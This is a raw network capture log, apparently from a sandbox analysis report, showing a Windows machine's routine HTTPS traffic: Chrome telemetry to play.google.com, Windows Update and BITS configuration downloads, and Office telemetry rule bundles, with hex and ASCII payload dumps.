2024-11-07 03:12:11 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 905 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 03:12:11 UTC	905	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 30 39 34 39 31 32 38 38 35 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1730949128858",null,null,null,
2024-11-07 03:12:11 UTC	937	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=kWmB3O6Lu9UBVP8dLREbVu5spjTqwwWW6RptjP7FsY-fObXfDcyc16feRp-TM-4dCaINggSecZnJ_hyxXXAms30LEi8ydoHZCghBhi9zhY9dDiDEU7pLvwHzJ3d2ZaSRZ9BfX9R0KRUHQEfTd97l2mOpXaYvULoQnuNDGUz2UZImsS6DhFA; expires=Fri, 09-May-2025 03:12:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Thu, 07 Nov 2024 03:12:11 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Thu, 07 Nov 2024 03:12:11 GMT Connection: close Transfer-Encoding: chunked
2024-11-07 03:12:11 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-07 03:12:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:11 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-07 03:12:11 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0790) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=100346 Date: Thu, 07 Nov 2024 03:12:11 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49752	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:12 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-07 03:12:13 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=100349 Date: Thu, 07 Nov 2024 03:12:12 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-07 03:12:13 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49753	142.250.186.78	443	7268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:13 UTC	923	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 910 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=519=kWmB3O6Lu9UBVP8dLREbVu5spjTqwwWW6RptjP7FsY-fObXfDcyc16feRp-TM-4dCaINggSecZnJ_hyxXXAms30LEi8ydoHZCghBhi9zhY9dDiDEU7pLvwHzJ3d2ZaSRZ9BfX9R0KRUHQEfTd97l2mOpXaYvULoQnuNDGUz2UZImsS6DhFA
2024-11-07 03:12:13 UTC	910	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 30 39 34 39 31 33 31 31 33 34 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1730949131134",null,null,null,
2024-11-07 03:12:13 UTC	945	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=ElEU3ZD9NdFXxQtlWZXHmd9LpLzmcW55hAjxLZj2DOzyKpC5gxvOtUSSPAAMSqov0bVGExjLvuyN6MrkbxoYlECFn2SB9vxcVMJBlJ6L7Op7bvIKEieTrFj5DfhSY8zdmZI8_tZ1lOySieGwNHBOTGIjI20r8QE7p8FsSxmKV8piCQH5WFqxQYHNb9E; expires=Fri, 09-May-2025 03:12:13 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Thu, 07 Nov 2024 03:12:13 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Thu, 07 Nov 2024 03:12:13 GMT Connection: close Transfer-Encoding: chunked
2024-11-07 03:12:13 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-07 03:12:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:15 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=u54vEykpv7wHeKh&MD=YpZXwanl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-07 03:12:15 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: d1447240-a172-42a5-91ec-af69d6a15857 MS-RequestId: bbbfb209-66e1-4974-a4b8-5391c97c1914 MS-CV: KI0PDUb2LEW+jFQB.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 07 Nov 2024 03:12:15 GMT Connection: close Content-Length: 24490
2024-11-07 03:12:15 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-07 03:12:15 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49763	20.12.23.50	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:54 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=u54vEykpv7wHeKh&MD=YpZXwanl HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-07 03:12:54 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: d5f73f0f-dfb2-4700-8514-a327bbe2e9d4 MS-RequestId: 345cbeca-4fb7-4493-b640-87b9daf5aee5 MS-CV: un2lwnU2BUKcDGnP.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 07 Nov 2024 03:12:53 GMT Connection: close Content-Length: 30005
2024-11-07 03:12:54 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-11-07 03:12:54 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:57 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:12:57 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:12:57 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Tue, 05 Nov 2024 17:40:36 GMT ETag: "0x8DCFDC0F4F27BCD" x-ms-request-id: 991f3130-801e-00a0-27ce-2f2196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031257Z-17df447cdb56mx55hC1DFWvbt400000000vg000000003dfy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:12:57 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-07 03:12:57 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
